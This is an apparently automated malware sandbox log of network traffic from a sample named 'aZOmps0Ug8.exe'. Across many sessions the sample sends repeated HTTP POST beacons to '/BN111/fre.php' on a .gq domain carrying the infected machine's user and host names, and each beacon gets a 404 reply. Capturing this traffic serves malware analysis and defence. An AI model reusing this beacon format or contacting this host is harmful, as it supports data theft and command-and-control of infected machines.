                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      57192.168.2.649912172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:44.429017067 CEST7891OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:44.444839001 CEST7892OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:29:44.601130962 CEST7893INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:44 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MFrv0XyktSeHA%2B%2FfE1zcEPcFFNmyDk1d8pBeW%2BPZ0DJJyDKM24IqF9Ua%2FLPJGa2QUt1%2F9p1PJhMy%2FqaXGD1%2FbCm79J0uGI0QAXTq9IQa9oVo94V3focmH3c91ymeJg1qFR1TPjejGWcfhJ7eFrLUoAL7XbrPtQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec148ba214e14-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      58192.168.2.649913172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:45.763144970 CEST7894OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:45.779706001 CEST7894OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:29:45.873655081 CEST7895INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:45 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RW1TGqFwuxrswdzsjqOAixFxJjq9GdKUdYo7aOj19dNBG4Lyyy7SsCmQykgjcONrTmazNouCKp2Z9hD9oj9zcv4osPlARNNPDj7pHenc2sXbowSWmyPcUlYaDlCHIFiv0mk3hl9DBkS9teWGWpN7dgSnssg4aw%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec1510989d70d-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      59192.168.2.649914172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:46.923367023 CEST7896OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:46.939387083 CEST7896OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:29:47.043380976 CEST7897INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:47 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tSBa4s2D4P4jpBx6UmblYjjTd9CZpovgF%2BPWqgNr38olq5O0aV%2BRwk6guUtz2KJcSkWnxUnrdqNk5vMbb8hVzaTtDOCB%2BcJpa1cxebjsNw2fxMN7oJxmUx78qf%2BG%2FL3VMFTIyyLXSMoDYeD9fnUR9J7qMZA67A%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec1584bd8d729-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      6192.168.2.649785104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:26.025161982 CEST1066OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:26.041390896 CEST1066OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:28:26.179322958 CEST1067INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:26 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NBl2laSVW7g6vrcMW38%2F2YBxeOPQrkwxtPhBgARwSEgAQNN%2Fw9iGGS%2FMcVDd5bsPKDfZf7F34jWKWukgO%2BC6zW4jkS8RqojfmfBcKo9bpy3LJAKlcTfInQaxeHYOzrjAYApe5O2EWJUMAr1uyWTrEaztAHnaRg%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69debf5eafe9695b-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      60192.168.2.649915172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:48.049870968 CEST7898OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:48.065565109 CEST7898OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:29:48.166955948 CEST7899INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:48 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9ZdGBK3Ox1p3BP97R4wYPo9%2BZ%2BK%2BUNVgFS7K2qZhwn3i65B5C5A3pC3HLkVBNXtwYCFsRF61IdHwby7cVDx52m03DlTnECOLo8Lmli9FT05kblnLTrBBndQTbweHp3wkkwehoYbNghK3zTDnn9Dwh%2FhMcQro9g%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec15f58a805f1-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      61192.168.2.649916172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:49.324402094 CEST7900OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:49.340414047 CEST7900OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:29:49.441760063 CEST7901INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:49 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VWWcbe3rqobGQ9zLXDZxDyBG75FOgSItYobuAtwDJpuAbL30zBatxbptze92UIC6gFoHQbenK4p440cH1CZduHVw9uJaoknjqoprxaW930U5gFR4LDNYtmvuhdpe4PmdBZYp9RJ3m58CjMFtKREDlk3%2FI4VSUQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec1674b4c2c3e-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      62192.168.2.649918104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:51.880553961 CEST7910OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:51.899096966 CEST7910OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:29:51.998187065 CEST7911INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:51 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BsMAOCkH1sJ0oabis0Q4paNtyJNrES9QQwxvqkXvAl%2FY7%2BLQH8xSnKIcHV%2BPPogWaqk3yG%2FJ6vxc%2FEk34SqAVeWUDw7vDSJQdrJh0Hz27m7Tiv3u6y6ahjT5NNVAW4JRx6Ib5AME7x%2F0Mc2jzF8N3OMd71mu%2FA%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec1774cc64e3d-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      63192.168.2.649921172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:55.836602926 CEST7917OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:55.852555990 CEST7917OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:29:55.948838949 CEST7923INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:55 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LZ79cKido18sGHwuiNL%2F6O3gjFK34JZEyXZk1N8Qfy7pzHQIXqqquQIRfLJylWp%2Blb0ebXTVq%2F1bHmKtkJSRQAwrjU9cWyaKEY%2BfKI4BTUk6fnLRAUL796Gtr9VyUOxCK%2BmAyJmCSy2lit2HcTF7NC6%2BtJ15NA%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec1900cfd68ef-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      64192.168.2.649923104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:56.968339920 CEST7926OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:56.984436989 CEST7927OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:29:57.081579924 CEST7927INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:57 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MLALdhBf343n2G8LZLoDwb6Mh5vWVGbC472SfDfdBH%2B1zblvJJUUdQJELnMb%2Bod0RSTtp3nexN46I4MemNvht6DC79ZyaLJ9Tj8z0PlQvLxyWkeCuuJUc6JQy22HYxAbvcclmEPUk4DRcOjj7k3c%2FCX8oeDUlg%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec1971aee4dbe-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      65192.168.2.649924104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:58.074973106 CEST7928OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:58.090995073 CEST7929OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:29:58.188767910 CEST7929INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:58 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pVTqfGYZG6lbiEUhHSdVmZCauemUr0Y%2BDwMOl8jQ0ldqgtA9xITilJs5vYZLZNEyT9OJN5kbjp%2BHOE4k2qqoAIe1jVhjQmKAUvsYFRYqMSmsNtQoFZ6LNXkpPSpmxGfDzqZFj4XqecgblbCCY5cS5zLZfkAuhA%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec19dfc3bdfcb-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      66192.168.2.649925172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:59.226830959 CEST7930OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:59.242714882 CEST7931OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:29:59.347254038 CEST7932INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:59 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gkjqA8qOHfmIDF%2B8y6qiYNfi%2BvKCn%2B9wfdd4HCP%2BYK0cnk28ajujXQRfcV4yPhPUB7cMD%2BZEx7KfsoCvsEDx9F1mGzxm8QL25QRC9D1NyirQW8VbFsNKnqSicUuJ0ck1LD6iO4oBLd%2BuJGOeJcZ4Ij1Vwl5I4w%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec1a53d361f21-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      67192.168.2.649926104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:30:00.311328888 CEST7932OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:30:00.327512026 CEST7933OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:30:00.468617916 CEST7933INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:30:00 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=iotQdWvLirTujDm5gcFSZO5hAVcZRC711g1iSDRI0%2Brb3822z%2BZAkRmuSDHdic5Uj57iNRI9xX3TN9YhS73pU0g3Awy8opYScVWOMDtQ3fUBF1pTWEZk13UdVN58f%2F5cQx2fm8PSSX%2BiO3wOmcduLTFZflpDzA%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec1abfe1005b3-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Oct 14, 2021 08:30:00.469223022 CEST7934INData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      68192.168.2.649927104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:30:01.416466951 CEST7935OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:30:01.432476044 CEST7935OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:30:01.529956102 CEST7936INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:30:01 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CiMowfP3p1ILABVXu8os0ZvSOz0H05YMNivh25CZUCDEqQaAY7dMsK8WCuL55RhExNK%2Bo6QnXW2OoiY91LV4aaKszjnsVP1HpaPN5F1rSwA%2BPDZXqH2LcFbJP9o0ixVca8u%2FnOqGjaVHkzJnEmiYU0ivx8ExBw%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec1b2eb3f1f2d-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      69192.168.2.649928104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:30:02.546683073 CEST7937OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
